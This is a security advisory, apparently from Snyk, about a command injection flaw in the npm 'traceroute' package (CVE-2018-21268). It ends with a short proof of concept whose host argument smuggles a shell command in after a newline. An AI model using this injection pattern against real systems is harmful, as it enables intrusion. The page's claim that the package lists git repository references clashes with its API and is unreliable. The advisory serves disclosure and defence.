Shell Command Injection Affecting traceroute package, versions <=1.0.0
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID npm:traceroute:20160311
- published 23 Jan 2018
- disclosed 9 Nov 2017
- credit Dor Dali
Introduced: 9 Nov 2017
CVE-2018-21268 Open this link in a new tabHow to fix?
There currently is no fixed version for traceroute
. A fix is on the master branch but was not published to npm.
Overview
traceroute
is an npm package used for listing references in a remote git repository.
Affected versions of this package are vulnerable to Arbitrary Command Injection due to the insecure use of exec
. An attacker can add a newline %0a
after the host addr, and inject malicious shell commands to disrupt server operation or obtain sensitive information.
PoC by Dor Dali
traceroute = require('traceroute');
host = '127.0.0.1\ntouch /tmp/malicious';
traceroute.trace(host, function (err,hops) {
// the file /tmp/malicious was created
console.log(hops);
});